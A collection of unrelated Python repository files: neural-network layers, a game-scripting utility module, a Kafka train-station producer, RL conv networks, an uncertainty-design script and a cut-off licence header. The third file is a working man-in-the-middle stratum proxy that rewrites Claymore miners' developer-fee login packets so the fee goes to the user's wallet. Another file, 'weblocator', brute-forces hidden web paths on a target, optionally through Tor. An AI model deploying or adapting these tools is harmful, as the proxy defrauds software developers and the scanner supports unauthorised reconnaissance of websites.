self.pConv1 = my_params.add_parameters(dim = (self.input_dim,self.window_receptor,1,self.internal_dim),init=normalInit)
self.pBias1 = my_params.add_parameters(dim = (self.internal_dim,))
self.builder_layers = []
for _ in range(num_layers):
conv = my_params.add_parameters(dim = (self.internal_dim,1,1,self.internal_dim),init=normalInit)
bias = my_params.add_parameters(dim = (self.internal_dim,))
self.builder_layers.append((conv,bias))
self.last_conv = my_params.add_parameters(dim = (self.internal_dim,1,1,self.output_dim),init=normalInit)
self.last_bias = my_params.add_parameters(dim = (self.output_dim,))
def get_final_states(self) -> List[transducers.FinalTransducerState]:
return self._final_states
def transduce(self, embed_sent: expression_seqs.ExpressionSequence) -> expression_seqs.ExpressionSequence:
src = embed_sent.as_tensor()
sent_len = tt.sent_len(src)
batch_size = tt.batch_size(src)
pad_size = (self.window_receptor-1)/2 #TODO adapt it also for even window size
src = dy.concatenate([dy.zeroes((self.input_dim,pad_size),batch_size=batch_size),src,dy.zeroes((self.input_dim,pad_size), batch_size=batch_size)],d=1)
padded_sent_len = sent_len + 2*pad_size
conv1 = dy.parameter(self.pConv1)
bias1 = dy.parameter(self.pBias1)
src_chn = dy.reshape(src,(self.input_dim,padded_sent_len,1),batch_size=batch_size)
cnn_layer1 = dy.conv2d_bias(src_chn,conv1,bias1,stride=[1,1])
hidden_layer = dy.reshape(cnn_layer1,(self.internal_dim,sent_len,1),batch_size=batch_size)
if self.non_linearity is 'linear':
hidden_layer = hidden_layer
elif self.non_linearity is 'tanh':
hidden_layer = dy.tanh(hidden_layer)
elif self.non_linearity is 'relu':
hidden_layer = dy.rectify(hidden_layer)
elif self.non_linearity is 'sigmoid':
hidden_layer = dy.logistic(hidden_layer)
for conv_hid, bias_hid in self.builder_layers:
hidden_layer = dy.conv2d_bias(hidden_layer, dy.parameter(conv_hid),dy.parameter(bias_hid),stride=[1,1])
hidden_layer = dy.reshape(hidden_layer,(self.internal_dim,sent_len,1),batch_size=batch_size)
if self.non_linearity is 'linear':
hidden_layer = hidden_layer
elif self.non_linearity is 'tanh':
hidden_layer = dy.tanh(hidden_layer)
elif self.non_linearity is 'relu':
hidden_layer = dy.rectify(hidden_layer)
elif self.non_linearity is 'sigmoid':
hidden_layer = dy.logistic(hidden_layer)
last_conv = dy.parameter(self.last_conv)
last_bias = dy.parameter(self.last_bias)
output = dy.conv2d_bias(hidden_layer,last_conv,last_bias,stride=[1,1])
output = dy.reshape(output, (sent_len,self.output_dim),batch_size=batch_size)
output_seq = expression_seqs.ExpressionSequence(expr_tensor=output)
self._final_states = [transducers.FinalTransducerState(output_seq[-1])]
return output_seq
@xnmt.require_torch
class MaxPoolCNNLayer(transducers.SeqTransducer, Serializable):
"""
One layer of CNN + (potentially strided) max-pooling.
"""
yaml_tag = "!MaxPoolCNNLayer"
@serializable_init
def __init__(self,
in_channels: numbers.Integral,
out_channels: numbers.Integral,
kernel_h: numbers.Integral = 1,
kernel_w: numbers.Integral = 1,
pad_cnn_h: bool = False,
pad_cnn_w: bool = False,
pool_h: numbers.Integral = 1,
pool_w: numbers.Integral = 1,
pad_pool_h: bool = False,
pad_pool_w: bool = False,
stride_h: numbers.Integral = 1,
stride_w: numbers.Integral = 1,
activation: str = 'selu'):
self.in_channels = in_channels
self.out_channels = out_channels
self.activation = activation
my_params = param_collections.ParamManager.my_params(self)
self.cnn_layer = nn.Conv2d(in_channels=in_channels,
out_channels=out_channels,
kernel_size=(kernel_h, kernel_w),
padding=(kernel_h // 2 if pad_cnn_h else 0,
kernel_w // 2 if pad_cnn_w else 0)).to(xnmt.device)
self.use_pooling = not (pool_h<=1 and pool_w<=1 and stride_h<=1 and stride_w<=1)
if self.use_pooling:
self.pooling_layer = nn.MaxPool2d(kernel_size=(pool_h, pool_w),
stride=(stride_h, stride_w),
padding=(pool_h // 2 if pad_pool_h else 0,
pool_w // 2 if pad_pool_w else 0)).to(xnmt.device)
my_params.append(self.cnn_layer)
self.activation_fct = tt.activation_by_name(activation)
def transduce(self, x: expression_seqs.ExpressionSequence) -> expression_seqs.ExpressionSequence:
expr = x.as_transposed_tensor()
batch_size, hidden_dim, seq_len = expr.size()
expr = expr.view((batch_size, self.in_channels, hidden_dim//self.in_channels, seq_len))
expr = self.cnn_layer(expr)
if self.use_pooling:
expr = self.pooling_layer(expr)
expr = self.activation_fct(expr)
batch_size, out_chn, out_h, seq_len = expr.size()
expr = expr.view((batch_size, out_chn * out_h, seq_len))
output_seq = expression_seqs.ExpressionSequence(expr_transposed_tensor = expr,
mask = x.mask.lin_subsampled(trg_len=seq_len) if x.mask else None)
self._final_states = [transducers.FinalTransducerState(output_seq[-1])]
return output_seq
def get_final_states(self) -> List[transducers.FinalTransducerState]:
return self._final_states
|
<reponame>nitanmarcel/scripthookvpy3k<gh_stars>10-100
import logging
import os
import pip.commands
import pip.exceptions
import pkg_resources
from gta.exceptions import *
__all__ = ('Message', 'CurlyBracketFormattingAdapter', 'get_directory', 'setup_logging',
'get_logger', 'install_dependency')
class Message:
"""
A wrapper class that applies the new formatting style on a message
and it's arguments.
It's safe to throw any object in here that has a __str__ method
(e.g. an exception).
..note:: Using keywords in the formatter will not work.
Arguments:
- `fmt`: A formatter string or an object that has a __str__
method.
- `args`: Arguments that will be passed to the formatter.
"""
def __init__(self, fmt, args):
"""Create a message instance with formatter and arguments."""
self._fmt = fmt
self._args = args
def __str__(self):
"""
Return a formatted string using curly brackets.
The __str__ method will be called if :attr:`_fmt` is not a
string.
"""
if isinstance(self._fmt, str):
return self._fmt.format(*self._args)
else:
return self._fmt.__str__()
class CurlyBracketFormattingAdapter(logging.LoggerAdapter):
"""
A logging style adapter that is able to use the new curly bracket
formatting style.
Arguments:
- `logger`: Instance of :class:`logging.Logger`.
- `extra`: Optional dict-like object that will be passed to
every log message and can be used for formatting.
"""
def __init__(self, logger, extra=None):
super().__init__(logger, extra or {})
def log(self, level, msg, *args, **kwargs):
"""
Pass a log message. Shouldn't be called directly. Use level
methods instead (e.g. info, warning, etc.).
"""
if self.isEnabledFor(level):
msg, kwargs = self.process(msg, kwargs)
# noinspection PyProtectedMember
self.logger._log(level, Message(msg, args), (), **kwargs)
def get_directory():
return os.path.abspath(os.path.join(os.getcwd(), 'python'))
def setup_logging(console):
"""
Setup logging formatter, handlers, etc. for the `gta` and `pip`
logger.
Arguments:
- `console`: Use console logging instead of file logging.
"""
# Setup formatter and handler
formatter = logging.Formatter(
fmt='{asctime} {name:<22} {levelname:<18} {message}',
datefmt='%Y-%m-%d %H:%M:%S',
style='{'
)
# Output in file or using the console
if console:
handler = logging.StreamHandler()
handler.setFormatter(formatter)
else:
handler = logging.FileHandler('scripthookvpy3k.log')
handler.setFormatter(formatter)
# Redirect warnings to the logger
logging.captureWarnings(True)
# Setup loggers
loggers = (
('gta', logging.DEBUG),
('py.warnings', logging.WARNING),
('asyncio', logging.INFO),
('pip', logging.WARNING)
)
for name, level in loggers:
logger = logging.getLogger(name)
logger.setLevel(level)
logger.addHandler(handler)
def get_logger(name='gta'):
"""
Wrap the curly bracket formatting adapter around a logger. Should
always be used instead of ``logging.getLogger``.
Arguments:
- `name`: The name of the logger.
Return the wrapped :class:`logging.logger` instance.
"""
return CurlyBracketFormattingAdapter(logging.getLogger(name))
dependencies_blacklist = {'aiohttp', 'numpy', 'scipy'}
def install_dependency(dependency):
"""
Install a dependency using :class:`pip`.
Arguments:
- `dependency`: A dependency as a `requirement specifier
<https://pip.pypa.io/en/latest/reference/pip_install.html#requirement-specifiers>`_.
- `use_script_path`: Install the dependency into the specified
directory instead of the scripts main directory.
"""
logger = get_logger()
# Get path
path = os.path.abspath(get_directory())
try:
# Check if dependency is satisfied
pkg_resources.require(dependency)
except pkg_resources.ResolutionError:
# Check if dependency is blacklisted
for requirement in pkg_resources.parse_requirements(dependency):
if requirement.project_name in dependencies_blacklist:
raise DependencyBlacklistedError(dependency)
try:
# Install dependency
message = 'Installing dependency "{}" into path "{}"'
logger.debug(message, dependency, os.path.relpath(path))
command = pip.commands.InstallCommand(isolated=True)
# Note: We can't run 'main' because it overrides our logging settings
options, args = command.parse_args([
'--disable-pip-version-check',
'--upgrade',
'--target', path,
dependency
])
command.run(options, args)
except pip.exceptions.PipError as exc:
raise InstallDependencyError(dependency) from exc
else:
logger.debug('Dependency "{}" already satisfied', dependency)
|
<gh_stars>10-100
#!/usr/bin/python2.7
import sys
import socket
import threading
import json
from collections import OrderedDict
import binascii
import re
import datetime
import time
import argparse
def server_loop(local_host, local_port, remote_host, remote_port):
# create the server object
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# lets see if we can stand up the server
try:
print "Daemon is launched, do not close this windows"
server.bind((local_host, local_port))
except:
print "[!!] Failed to listen on %s:%d" % (local_host, local_port)
print "[!!] Check for other listening sockets or correct permissions"
sys.exit(0)
# listen with 5 backlogged--queued--connections
server.listen(5)
while True:
client_socket, addr = server.accept()
# print out the local connection information
print"[+] Received incomming connections from %s:%d" % (addr[0], addr[1])
# start a new thread to talk to the remote host
proxy_thread = threading.Thread(target=proxy_handler,
args=(client_socket, remote_host, remote_port))
proxy_thread.daemon = False
proxy_thread.start()
def receive_from(connection):
buffer = ""
# We set a 2 second time out depending on your
# target this may need to be adjusted
connection.settimeout(0)
try:
# keep reading into the buffer until there's no more data
# or we time out
while True:
data = connection.recv(4096)
if not data:
break
buffer += data
except:
pass
return buffer
# modify any requests destined for the remote host
def request_handler(socket_buffer):
#Here is the good part
#If it is an Auth packet
if ('submitLogin' in socket_buffer) or ('eth_login' in socket_buffer):
json_data = json.loads(socket_buffer, object_pairs_hook=OrderedDict)
print('[+] Auth in progress with address: ' + json_data['params'][0])
#If the auth contain an other address than ours
if wallet not in json_data['params'][0]:
print('[*] DevFee Detected - Replacing Address - ' + str(datetime.datetime.now()))
print('[*] OLD: ' + json_data['params'][0])
#We replace the address
json_data['params'][0] = wallet + worker_name
print('[*] NEW: ' + json_data['params'][0])
socket_buffer = json.dumps(json_data) + '\n'
#Packet is forged, ready to send.
return socket_buffer
# modify any responses destined for the local host
def response_handler(buffer):
return buffer
def proxy_handler(client_socket, remote_host, remote_port):
# We prepare the connection
remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# We will try to connect to the remote pool
for attempt_pool in range(3):
try:
remote_socket.connect((remote_host, remote_port))
except:
print "[!] Impossible to connect to the pool. Try again in few seconds "
time.sleep(2)
else:
# Connection OK
break
else:
print "[!] Impossible initiate connection to the pool. Claymore should reconnect. (Check your internet connection) "+ str(datetime.datetime.now())
#Closing connection
client_socket.shutdown(socket.SHUT_RDWR)
client_socket.close()
#Exiting Thread
sys.exit()
# now let's loop and reading from local, send to remote, send to local
# rinse wash repeat
while True:
# read from local host
local_buffer = receive_from(client_socket)
if len(local_buffer):
# send it to our request handler
local_buffer = request_handler(local_buffer)
#print local_buffer
# Try to send off the data to the remote pool
try:
remote_socket.send(local_buffer)
except:
print "[!] Sending packets to pool failed."
time.sleep(0.02)
print "[!] Connection with pool lost. Claymore should reconnect. (May be temporary) "+ str(datetime.datetime.now())
#Closing connection
client_socket.shutdown(socket.SHUT_RDWR)
client_socket.close()
#Exiting loop
break
# Adding delay to avoid too much CPU Usage
time.sleep(0.001)
# receive back the response
remote_buffer = receive_from(remote_socket)
if len(remote_buffer):
# send to our response handler
remote_buffer = response_handler(remote_buffer)
#print local_buffer
# Try to send the response to the local socket
try:
client_socket.send(remote_buffer)
except:
print('[-] Auth Disconnected - Ending Devfee or stopping mining - ' + str(datetime.datetime.now()))
client_socket.close()
break
# Adding delay to avoid too much CPU Usage
time.sleep(0.001)
time.sleep(0.001)
#Clean exit if we break the loop
sys.exit()
def main():
parser = argparse.ArgumentParser(description='')
parser.add_argument('-o', '--remote-host', dest='remote_host', type=str, default='us1.ethermine.org', help='Hostname of Stratum mining pool')
parser.add_argument('-p', '--remote-port', dest='remote_port', type=int, default=4444, help='Port of Stratum mining pool')
parser.add_argument('-O', '--local-host', dest='local_host', type=str, default='0.0.0.0', help='On which network interface listen for stratum miners. Use "localhost" for listening on internal IP only.')
parser.add_argument('-P', '--local-port', dest='local_port', type=int, default=8008, help='Port on which port listen for stratum miners.')
parser.add_argument('-w', '--wallet-address', dest='wallet_address', type=str, required=True, help='Wallet address, may include rig name with "." or "/" separator')
args = parser.parse_args()
# set up listening parameters
local_host = args.local_host
local_port = args.local_port
# set up remote targets
remote_host = args.remote_host
remote_port = args.remote_port
m = re.search('^(?P<wallet_addr>[^./]+)(?P<rig_name>[./].+)?', args.wallet_address)
if m is None:
print('Invalid wallet address, exiting...');
sys.exit(-1)
# Set the wallet
global wallet
wallet = str(m.group('wallet_addr') or '')
global worker_name
worker_name = str(m.group('rig_name') or '')
print "Wallet set: " + wallet + worker_name
# now spin up our listening socket
server_loop(local_host, local_port, remote_host, remote_port)
if __name__ == "__main__":
main()
|
<gh_stars>0
"""Methods pertaining to loading and configuring CTA "L" station data."""
import logging
import time
from pathlib import Path
from confluent_kafka import avro
from models import Turnstile
from models.producer import Producer
import asyncio
logger = logging.getLogger(__name__)
class Station(Producer):
"""Defines a single station"""
# key_schema = avro.load(f"{Path(__file__).parents[0]}/schemas/arrival_key.json")
# value_schema = avro.load(f"{Path(__file__).parents[0]}/schemas/arrival_value.json")
key_schema = avro.load(
"/home/pczhang/Nutstore/Udacity/DataStreamingNanoDegree/project1/passed/producer/models/schemas/arrival_key.json")
value_schema = avro.load(
"/home/pczhang/Nutstore/Udacity/DataStreamingNanoDegree/project1/passed/producer/models/schemas/arrival_value.json")
def __init__(self, station_id, name, color, direction_a=None, direction_b=None):
self.name = name
station_name = (self.name.lower().replace("/", "_and_")
.replace(" ", "_")
.replace("-", "_")
.replace("'", "")
)
super().__init__(
topic_name="chicago.cta.station.arrivals",
key_schema=Station.key_schema,
value_schema=Station.value_schema,
num_partitions=5,
num_replicas=1,
)
self.station_id = int(station_id)
self.color = color
self.dir_a = direction_a
self.dir_b = direction_b
self.a_train = None
self.b_train = None
self.turnstile = Turnstile(self)
def run(self, train, direction, prev_station_id, prev_direction):
"""Simulates train arrivals at this station"""
asyncio.run(self.run_produce(train, direction, prev_station_id, prev_direction))
async def run_produce(self, train, direction, prev_station_id, prev_direction):
res = asyncio.create_task(self.produce_foo(train, direction, prev_station_id, prev_direction))
await res
async def produce_foo(self, train, direction, prev_station_id, prev_direction):
try:
logger.info('')
val = {
"station_id": self.station_id,
"train_id": train.train_id,
"direction": direction,
# "line": self.color.name,
"line": 'test_color',
"train_status": train.status.name,
"prev_station_id": prev_station_id,
"prev_direction": prev_direction,
}
self.producer.produce(
topic=self.topic_name,
key={"timestamp": self.time_millis()},
value=val,
)
await asyncio.sleep(0.5)
logger.info(f'sent: {val}')
except Exception as e:
logger.fatal(e)
logger.info('Yeah, the bug is poped up until here!')
def __str__(self):
return "Station | {:^5} | {:<30} | Direction A: | {:^5} | departing to {:<30} | Direction B: | {:^5} | departing to {:<30} | ".format(
self.station_id,
self.name,
self.a_train.train_id if self.a_train is not None else "---",
self.dir_a.name if self.dir_a is not None else "---",
self.b_train.train_id if self.b_train is not None else "---",
self.dir_b.name if self.dir_b is not None else "---",
)
def __repr__(self):
return str(self)
def arrive_a(self, train, prev_station_id, prev_direction):
"""Denotes a train arrival at this station in the 'a' direction"""
self.a_train = train
self.run(train, "a", prev_station_id, prev_direction)
def arrive_b(self, train, prev_station_id, prev_direction):
"""Denotes a train arrival at this station in the 'b' direction"""
self.b_train = train
self.run(train, "b", prev_station_id, prev_direction)
def close(self):
"""Prepares the producer for exit by cleaning up the producer"""
self.turnstile.close()
super(Station, self).close()
|
#######################################################################
# Copyright (C) 2017 <NAME>(<EMAIL>) #
# Permission given to modify the code as long as you keep this #
# declaration at the top #
#######################################################################
from .base_network import *
# Network for pixel Atari game with value based methods
class NatureConvNet(nn.Module, VanillaNet):
def __init__(self, in_channels, n_actions, gpu=0):
super(NatureConvNet, self).__init__()
self.conv1 = nn.Conv2d(in_channels, 32, kernel_size=8, stride=4)
self.conv2 = nn.Conv2d(32, 64, kernel_size=4, stride=2)
self.conv3 = nn.Conv2d(64, 64, kernel_size=3, stride=1)
self.fc4 = nn.Linear(7 * 7 * 64, 512)
self.fc5 = nn.Linear(512, n_actions)
BasicNet.__init__(self, gpu)
def forward(self, x):
x = self.variable(x)
y = F.relu(self.conv1(x))
y = F.relu(self.conv2(y))
y = F.relu(self.conv3(y))
y = y.view(y.size(0), -1)
y = F.relu(self.fc4(y))
return self.fc5(y)
# Network for pixel Atari game with dueling architecture
class DuelingNatureConvNet(nn.Module, DuelingNet):
def __init__(self, in_channels, n_actions, gpu=0):
super(DuelingNatureConvNet, self).__init__()
self.conv1 = nn.Conv2d(in_channels, 32, kernel_size=8, stride=4)
self.conv2 = nn.Conv2d(32, 64, kernel_size=4, stride=2)
self.conv3 = nn.Conv2d(64, 64, kernel_size=3, stride=1)
self.fc4 = nn.Linear(7 * 7 * 64, 512)
self.fc_advantage = nn.Linear(512, n_actions)
self.fc_value = nn.Linear(512, 1)
BasicNet.__init__(self, gpu)
def forward(self, x):
x = self.variable(x)
y = F.relu(self.conv1(x))
y = F.relu(self.conv2(y))
y = F.relu(self.conv3(y))
y = y.view(y.size(0), -1)
phi = F.relu(self.fc4(y))
return phi
class OpenAIActorCriticConvNet(nn.Module, ActorCriticNet):
def __init__(self,
in_channels,
n_actions,
LSTM=False,
gpu=-1):
super(OpenAIActorCriticConvNet, self).__init__()
self.conv1 = nn.Conv2d(in_channels, 32, 3, stride=2, padding=1)
self.conv2 = nn.Conv2d(32, 32, 3, stride=2, padding=1)
self.conv3 = nn.Conv2d(32, 32, 3, stride=2, padding=1)
self.conv4 = nn.Conv2d(32, 32, 3, stride=2, padding=1)
self.LSTM = LSTM
hidden_units = 256
if LSTM:
self.layer5 = nn.LSTMCell(32 * 3 * 3, hidden_units)
else:
self.layer5 = nn.Linear(32 * 3 * 3, hidden_units)
self.fc_actor = nn.Linear(hidden_units, n_actions)
self.fc_critic = nn.Linear(hidden_units, 1)
BasicNet.__init__(self, gpu=gpu, LSTM=LSTM)
if LSTM:
self.h = self.variable(np.zeros((1, hidden_units)))
self.c = self.variable(np.zeros((1, hidden_units)))
def forward(self, x, update_LSTM=True):
x = self.variable(x)
y = F.elu(self.conv1(x))
y = F.elu(self.conv2(y))
y = F.elu(self.conv3(y))
y = F.elu(self.conv4(y))
y = y.view(y.size(0), -1)
if self.LSTM:
h, c = self.layer5(y, (self.h, self.c))
if update_LSTM:
self.h = h
self.c = c
phi = h
else:
phi = F.elu(self.layer5(y))
return phi
class OpenAIConvNet(nn.Module, VanillaNet):
def __init__(self,
in_channels,
n_actions,
gpu=0):
super(OpenAIConvNet, self).__init__()
self.conv1 = nn.Conv2d(in_channels, 32, 3, stride=2, padding=1)
self.conv2 = nn.Conv2d(32, 32, 3, stride=2, padding=1)
self.conv3 = nn.Conv2d(32, 32, 3, stride=2, padding=1)
self.conv4 = nn.Conv2d(32, 32, 3, stride=2, padding=1)
hidden_units = 256
self.layer5 = nn.Linear(32 * 3 * 3, hidden_units)
self.fc6 = nn.Linear(hidden_units, n_actions)
BasicNet.__init__(self, gpu=gpu, LSTM=False)
def forward(self, x, update_LSTM=True):
x = self.variable(x)
y = F.elu(self.conv1(x))
y = F.elu(self.conv2(y))
y = F.elu(self.conv3(y))
y = F.elu(self.conv4(y))
y = y.view(y.size(0), -1)
phi = F.elu(self.layer5(y))
return self.fc6(phi)
class NatureActorCriticConvNet(nn.Module, ActorCriticNet):
def __init__(self,
in_channels,
n_actions,
gpu=-1):
super(NatureActorCriticConvNet, self).__init__()
self.conv1 = nn.Conv2d(in_channels, 32, kernel_size=8, stride=4)
self.conv2 = nn.Conv2d(32, 64, kernel_size=4, stride=2)
self.conv3 = nn.Conv2d(64, 32, kernel_size=3, stride=1)
self.fc4 = nn.Linear(7 * 7 * 32, 512)
self.fc_actor = nn.Linear(512, n_actions)
self.fc_critic = nn.Linear(512, 1)
BasicNet.__init__(self, gpu=gpu)
def forward(self, x, _):
x = self.variable(x)
x = F.relu(self.conv1(x))
x = F.relu(self.conv2(x))
x = F.relu(self.conv3(x))
x = x.view(x.size(0), -1)
phi = F.relu(self.fc4(x))
return phi
class CategoricalConvNet(nn.Module, CategoricalNet):
def __init__(self, in_channels, n_actions, n_atoms, gpu=0):
super(CategoricalConvNet, self).__init__()
self.conv1 = nn.Conv2d(in_channels, 32, kernel_size=8, stride=4)
self.conv2 = nn.Conv2d(32, 64, kernel_size=4, stride=2)
self.conv3 = nn.Conv2d(64, 64, kernel_size=3, stride=1)
self.fc4 = nn.Linear(7 * 7 * 64, 512)
self.fc_categorical = nn.Linear(512, n_actions * n_atoms)
self.n_actions = n_actions
self.n_atoms = n_atoms
BasicNet.__init__(self, gpu)
def forward(self, x):
x = self.variable(x)
y = F.relu(self.conv1(x))
y = F.relu(self.conv2(y))
y = F.relu(self.conv3(y))
y = y.view(y.size(0), -1)
y = F.relu(self.fc4(y))
return y |
<reponame>davidtavarez/weblocator
#!/usr/bin/env python
import argparse
import os
import socket
import threading
from urllib import urlopen
import socks
from helpers import print_message, is_online, split_list, is_path_available
def create_tor_connection(address):
sock = socks.socksocket()
sock.connect(address)
return sock
def worker(host, words_list, starting_point, port=80, http=True, validation=None):
protocol = 'http' if http else 'https'
for word in words_list:
if '.' not in word:
word = '{}/'.format(word)
if is_path_available(host=host, url_path=word, starting_point=starting_point, http=http, port=port,
validation=validation, ):
print_message("\t[+] {}://{}:{}{}{}\n".format(protocol, host, port, starting_point, word))
return
if __name__ == '__main__':
print_message(" __ __ _ _ _ \n")
print_message(" \ \ / / | | | | | | \n")
print_message(" \ \ /\ / /__| |__ | | ___ ___ __ _| |_ ___ _ __ \n")
print_message(" \ \/ \/ / _ \ '_ \| | / _ \ / __/ _` | __/ _ \| '__| \n")
print_message(" \ /\ / __/ |_) | |___| (_) | (_| (_| | || (_) | | \n")
print_message(" \/ \/ \___|_.__/|______\___/ \___\__,_|\__\___/|_| \n")
print_message(" \n")
print_message("weblocator.py - Just another DirBuster\n")
print_message("Version 1.0\n")
print_message("<NAME> (davidtavarez)\n")
print_message("https://github.com/davidtavarez/weblocator\n\n")
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", help="The URL of the TARGET to scan.", required=True)
parser.add_argument("-w", "--wordslist", help="The words list path.", required=True)
parser.add_argument("-p", "--port", help="The words list path.", required=True)
parser.add_argument("-o", "--protocol", help="Protocol (http or https).", required=True)
parser.add_argument("-s", "--starting", help="Starting point (/).", required=True)
parser.add_argument("--validation", help="Try to find a string to validate the results.", required=False)
parser.add_argument("--extension", help="Add an extension.", required=False)
parser.add_argument("--threads", help="Number of threads [default=1].", required=False)
parser.add_argument("--tor-host", help="Tor server.", required=False)
parser.add_argument("--tor-port", help="Tor port server.", required=False)
args = parser.parse_args()
protocol = 'http' if not args.protocol else args.protocol
if protocol not in ['http', 'https']:
print_message("ERROR: Invalid protocol.\n")
exit(-1)
http = True
if protocol == 'https':
http = False
if args.tor_host:
try:
print_message("Opening Tor socket... ")
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, args.tor_host, int(args.tor_port), True)
socket.socket = socks.socksocket
socket.create_connection = create_tor_connection
print_message("OK (" + urlopen('http://ip.42.pl/raw').read() + ").\n")
except Exception as e:
print_message(e.message)
exit(-1)
if not args.target or not args.wordslist:
print_message("ERROR: missing arguments.\n")
exit(-1)
if not os.path.isfile(args.wordslist):
print_message("ERROR: words list can't be found.\n")
exit(-1)
print_message("Checking if " + args.target + " is online... ")
if not is_online(args.target):
print_message("ERROR: host is down.\n")
exit(-1)
print_message("OK.\n")
words = []
print_message("Reading the words list... ")
word_list = open(args.wordslist)
for line in word_list.readlines():
word = line.strip()
if args.extension:
word = "{}.{}".format(word, args.extension)
words.append(word)
word_list.close()
print_message("OK.\n\tThe selected file contains " + str(len(words)) + " paths.\n")
threads = 1
if args.threads:
threads = int(args.threads)
print_message("Hunting paths using " + str(threads) + " threads... just wait...\n")
port = 80
if args.port:
port = int(args.port)
starting = '/'
if args.starting:
starting = args.starting
for portion in split_list(words, threads):
threading.Thread(target=worker, args=(args.target, portion, starting, port, http, args.validation)).start()
|
<reponame>ConnectedSystems/pyapprox
"""
Design Under Uncertainty
========================
We will ue the Cantilever Beam benchmark to illustrate how to design under uncertainty.
.. figure:: ../../figures/cantilever-beam.png
:align: center
Conceptual model of the cantilever-beam
.. table:: Uncertainties
:align: center
=============== ========= =======================
Uncertainty Symbol Prior
=============== ========= =======================
Yield stress :math:`R` :math:`N(40000,2000)`
Young's modulus :math:`E` :math:`N(2.9e7,1.45e6)`
Horizontal load :math:`X` :math:`N(500,100)`
Vertical Load :math:`Y` :math:`N(1000,100)`
=============== ========= =======================
First we must specify the distribution of the random variables
"""
import numpy as np
import pyapprox as pya
from pyapprox.benchmarks.benchmarks import setup_benchmark
from functools import partial
from pyapprox.optimization import *
benchmark = setup_benchmark('cantilever_beam')
np.random.seed(1)
from pyapprox.models.wrappers import ActiveSetVariableModel
nsamples = 10
samples = pya.generate_independent_random_samples(benchmark.variable,nsamples)
fun = ActiveSetVariableModel(
benchmark.fun,benchmark.variable.num_vars()+benchmark.design_variable.num_vars(),
samples,benchmark.design_var_indices)
jac = ActiveSetVariableModel(
benchmark.jac,benchmark.variable.num_vars()+benchmark.design_variable.num_vars(),
samples,benchmark.design_var_indices)
nsamples = 10000
generate_random_samples = partial(
pya.generate_independent_random_samples,benchmark.variable,nsamples)
#set seed so that finite difference jacobian always uses the same set of samples for each
#step size and as used for computing the exact gradient
seed=1
generate_sample_data = partial(
generate_monte_carlo_quadrature_data,generate_random_samples,
benchmark.variable.num_vars(),benchmark.design_var_indices,seed=seed)
num_vars = benchmark.variable.num_vars()+benchmark.design_variable.num_vars()
objective = StatisticalConstraint(
benchmark.fun,benchmark.jac,expectation_fun,expectation_jac,num_vars,
benchmark.design_var_indices,generate_sample_data,isobjective=True)
init_guess = 2*np.ones((2,1))
errors = pya.check_gradients(
objective,objective.jacobian,init_guess,disp=False)
print(errors.min())
assert errors.min()<6e-6
from pyapprox.cvar_regression import \
smooth_conditional_value_at_risk_composition
smoother_type,eps,alpha=0,1e-3,0.75
#stat_fun = partial(smooth_conditional_value_at_risk,smoother_type,eps,alpha)
#stat_jac = True
tol=0.0
stat_fun = partial(smooth_prob_failure_fun,smoother_type,eps,tol)
stat_jac = partial(smooth_prob_failure_jac,smoother_type,eps,tol)
upper_bound=True
bound=0.05
#stat_fun,stat_jac,upper_bound = expectation_fun,expectation_jac,True
#bound=0
constraint = StatisticalConstraint(
benchmark.constraint_fun,benchmark.constraint_jac,stat_fun,stat_jac,
num_vars,benchmark.design_var_indices,generate_sample_data,bound=bound,
upper_bound=upper_bound)
print('####')
#init_guess = 3*np.ones((2,1))
init_guess = np.array([[2.3,3.4]]).T
print(constraint(init_guess))
print(approx_jacobian(constraint,init_guess,epsilon=1e-5))
print(constraint.jacobian(init_guess))
#assert False
#print(constraint(init_guess))
errors = pya.check_gradients(
constraint,constraint.jacobian,init_guess,disp=True)
#assert errors.min()<1e-7
from scipy.optimize import minimize, NonlinearConstraint
def run_design(objective,jac,constraints,constraints_jac,bounds,x0,options):
options=options.copy()
if constraints_jac is None:
constraints_jac = [None]*len(constraints)
scipy_constraints = []
for constraint, constraint_jac in zip(constraints,constraints_jac):
scipy_constraints.append(NonlinearConstraint(
constraint,0,np.inf,jac=constraint_jac))
method = options.get('method','slsqp')
if 'method' in options: del options['method']
callback=options.get('callback',None)
if 'callback' in options:
del options['callback']
print(x0[:,0])
res = minimize(
objective, x0[:,0], method=method, jac=jac, hess=None,
constraints=scipy_constraints,options=options,callback=callback,
bounds=bounds)
return res.x, res
print('$$$$')
jac=None
jac=objective.jacobian
cons_jac='2-point'
#cons_jac=constraint.jacobian
#options={'callback':lambda xk : print(xk),'disp':True,'iprint':5,'method':'slsqp'}
options={'disp':True,'verbose':2,'method':'trust-constr','gtol':1e-6}
x,res=run_design(objective,jac,[constraint],[cons_jac],benchmark.design_variable.bounds,init_guess,options)
print(res)
print(constraint(res.x)+bound)
for ii in range(constraint.fun_values.shape[1]):
print('b',np.where(constraint.fun_values[:,ii:ii+1]>0)[0].shape[0]/nsamples)
#robust design
#min f subject to variance<tol
#reliability design
#min f subject to prob failure<tol
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 NORDUnet A/S
# Copyright (c) 2018 SUNET
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or
# without modification, are permitted provided that the following
# conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# 3. Neither the name of the NORDUnet nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
